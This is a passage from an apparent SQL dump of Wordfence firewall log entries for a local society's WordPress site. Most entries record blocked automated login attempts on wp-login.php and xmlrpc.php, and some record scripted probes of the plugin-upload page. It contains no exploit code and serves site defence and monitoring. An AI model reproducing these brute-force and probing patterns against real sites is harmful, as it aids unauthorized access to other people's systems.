Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10952,0.000000,1630713153.467781,'\0\0\0\0\0\0\0\0\0\0��t˖G',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10953,0.000000,1630713266.377170,'\0\0\0\0\0\0\0\0\0\0���Do�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10954,0.000000,1630713580.533129,'\0\0\0\0\0\0\0\0\0\0���G?/',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10955,0.000000,1630713596.278686,'\0\0\0\0\0\0\0\0\0\0���6�L',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10956,1630713598.115359,1630713598.040500,'\0\0\0\0\0\0\0\0\0\0���6�L',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10957,0.000000,1630714163.035500,'\0\0\0\0\0\0\0\0\0\0��g9��',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10958,0.000000,1630715249.614986,'\0\0\0\0\0\0\0\0\0\0��3Kȷ',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10959,0.000000,1630715325.199211,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10960,0.000000,1630715929.482235,'\0\0\0\0\0\0\0\0\0\0��\"���',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10961,0.000000,1630716068.559309,'\0\0\0\0\0\0\0\0\0\0�����R',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10962,1630716070.106739,1630716069.990800,'\0\0\0\0\0\0\0\0\0\0�����R',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10963,0.000000,1630716760.548646,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10964,1630716761.890634,1630716761.807600,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10965,0.000000,1630717140.726523,'\0\0\0\0\0\0\0\0\0\0��k�X�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10966,0.000000,1630717376.010911,'\0\0\0\0\0\0\0\0\0\0���n\\�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10967,0.000000,1630717864.555516,'\0\0\0\0\0\0\0\0\0\0���,�7',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10968,0.000000,1630718444.453302,'\0\0\0\0\0\0\0\0\0\0��D�\n9',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10969,0.000000,1630719108.369811,'\0\0\0\0\0\0\0\0\0\0��S�\0',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10970,0.000000,1630719504.497651,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10971,0.000000,1630719756.323502,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10972,0.000000,1630720387.979068,'\0\0\0\0\0\0\0\0\0\0��>���',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10973,0.000000,1630721058.299781,'\0\0\0\0\0\0\0\0\0\0��m�;-',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10974,0.000000,1630721623.988315,'\0\0\0\0\0\0\0\0\0\0��/�\'',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10975,0.000000,1630721721.506655,'\0\0\0\0\0\0\0\0\0\0��C�,6',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10976,0.000000,1630722342.188437,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10977,1630722365.363897,1630722365.215200,'\0\0\0\0\0\0\0\0\0\0���6�<',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10978,0.000000,1630722415.242917,'\0\0\0\0\0\0\0\0\0\0���(:�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10979,0.000000,1630723100.306155,'\0\0\0\0\0\0\0\0\0\0��\"@�f',0,200,0,1,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','loginFailValidUsername',NULL,NULL),(10980,0.000000,1630723748.111220,'\0\0\0\0\0\0\0\0\0\0��E��p',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.122 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10981,0.000000,1630723775.279513,'\0\0\0\0\0\0\0\0\0\0��gzj�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10982,0.000000,1630724473.701927,'\0\0\0\0\0\0\0\0\0\0��-�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10983,0.000000,1630725159.106690,'\0\0\0\0\0\0\0\0\0\0��.i|b',0,200,0,1,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','loginFailValidUsername',NULL,NULL),(10984,0.000000,1630725179.718578,'\0\0\0\0\0\0\0\0\0\0��g�p',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10985,0.000000,1630725875.377093,'\0\0\0\0\0\0\0\0\0\0���;N�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10986,0.000000,1630725891.137298,'\0\0\0\0\0\0\0\0\0\0��_կ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10987,0.000000,1630726603.704650,'\0\0\0\0\0\0\0\0\0\0��DB�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10988,0.000000,1630727310.790228,'\0\0\0\0\0\0\0\0\0\0��-��',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10989,0.000000,1630728030.682152,'\0\0\0\0\0\0\0\0\0\0��aO�2',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10990,0.000000,1630728040.813505,'\0\0\0\0\0\0\0\0\0\0�����(',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10991,0.000000,1630728281.627217,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10992,1630728289.768678,1630728289.659500,'\0\0\0\0\0\0\0\0\0\0��k�?�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10993,0.000000,1630728765.010723,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10994,0.000000,1630729490.214003,'\0\0\0\0\0\0\0\0\0\0���_�',0,503,0,0,0,'https://www.bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10995,0.000000,1630729713.345695,'\0\0\0\0\0\0\0\0\0\0���VM�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10996,0.000000,1630729924.302388,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10997,1630729926.249812,1630729926.165000,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(10998,0.000000,1630729948.173873,'\0\0\0\0\0\0\0\0\0\0���zaD',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(10999,0.000000,1630729989.131545,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11000,1630729993.647541,1630729993.566600,'\0\0\0\0\0\0\0\0\0\0��Eţ�',0,503,0,0,0,'https://bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11001,0.000000,1630730194.109341,'\0\0\0\0\0\0\0\0\0\0��a��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11002,0.000000,1630730222.868998,'\0\0\0\0\0\0\0\0\0\0����ʰ',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11003,0.000000,1630730469.064082,'\0\0\0\0\0\0\0\0\0\0��ár�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11004,0.000000,1630730750.630031,'\0\0\0\0\0\0\0\0\0\0��P��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11005,0.000000,1630730988.421431,'\0\0\0\0\0\0\0\0\0\0��H�)�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11006,0.000000,1630731261.792706,'\0\0\0\0\0\0\0\0\0\0��>�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11007,0.000000,1630731522.405012,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11008,0.000000,1630731750.748346,'\0\0\0\0\0\0\0\0\0\0���b�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11009,0.000000,1630732013.858680,'\0\0\0\0\0\0\0\0\0\0��1��E',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11010,0.000000,1630732307.289665,'\0\0\0\0\0\0\0\0\0\0���X�$',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11011,0.000000,1630732348.323115,'\0\0\0\0\0\0\0\0\0\0��j4��',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11012,0.000000,1630732558.013439,'\0\0\0\0\0\0\0\0\0\0����8\Z',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11013,0.000000,1630732804.029894,'\0\0\0\0\0\0\0\0\0\0��o��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11014,0.000000,1630733096.495922,'\0\0\0\0\0\0\0\0\0\0��£�5',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11015,0.000000,1630733337.152315,'\0\0\0\0\0\0\0\0\0\0���]�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11016,0.000000,1630733592.996204,'\0\0\0\0\0\0\0\0\0\0���u,?',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11017,0.000000,1630733878.592297,'\0\0\0\0\0\0\0\0\0\0��4�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11018,0.000000,1630734115.393073,'\0\0\0\0\0\0\0\0\0\0����Z�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11019,0.000000,1630734397.024762,'\0\0\0\0\0\0\0\0\0\0����y�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11020,0.000000,1630734642.780737,'\0\0\0\0\0\0\0\0\0\0��\"��q',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11021,0.000000,1630734938.757633,'\0\0\0\0\0\0\0\0\0\0��]qo\"',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11022,0.000000,1630735219.536585,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11023,0.000000,1630735740.764385,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11024,1630735747.450996,1630735747.348000,'\0\0\0\0\0\0\0\0\0\0����R',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-admin/plugin-install.php?tab=upload',NULL,'python-requests/2.26.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL3BsdWdpbi1pbnN0YWxsLnBocA==\"}'),(11025,0.000000,1630735976.023725,'\0\0\0\0\0\0\0\0\0\0�����',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11026,0.000000,1630736241.178325,'\0\0\0\0\0\0\0\0\0\0��؞��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11027,0.000000,1630736457.154459,'\0\0\0\0\0\0\0\0\0\0���;N�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11028,0.000000,1630736711.368307,'\0\0\0\0\0\0\0\0\0\0��[��T',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11029,0.000000,1630736813.786025,'\0\0\0\0\0\0\0\0\0\0��Rʬ�',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11030,0.000000,1630736914.767423,'\0\0\0\0\0\0\0\0\0\0����r',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11031,0.000000,1630736919.064158,'\0\0\0\0\0\0\0\0\0\0������',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11032,0.000000,1630736978.121904,'\0\0\0\0\0\0\0\0\0\0����',0,503,0,0,0,'https://www.bournesociety.org.uk/wp-login.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11033,0.000000,1630737119.822877,'\0\0\0\0\0\0\0\0\0\0��g��',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11034,0.000000,1630737375.165105,'\0\0\0\0\0\0\0\0\0\0��xO�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11035,0.000000,1630737540.339754,'\0\0\0\0\0\0\0\0\0\0���ǂ�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11036,0.000000,1630737744.370917,'\0\0\0\0\0\0\0\0\0\0��\rK(�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11037,0.000000,1630737748.125073,'\0\0\0\0\0\0\0\0\0\0����u',0,503,0,0,0,'https://www.bournesociety.org.uk//xmlrpc.php','','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11038,0.000000,1630737951.987159,'\0\0\0\0\0\0\0\0\0\0��g�t2',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(11039,0.000000,1630738121.409267,'\0\0\0\0\0\0\0\0\0\0���GE�',0,503,0,0,0,'https://bournesociety.org.uk/xmlrpc.php','','Mozilla/5.0 (X11; Ubuntu; 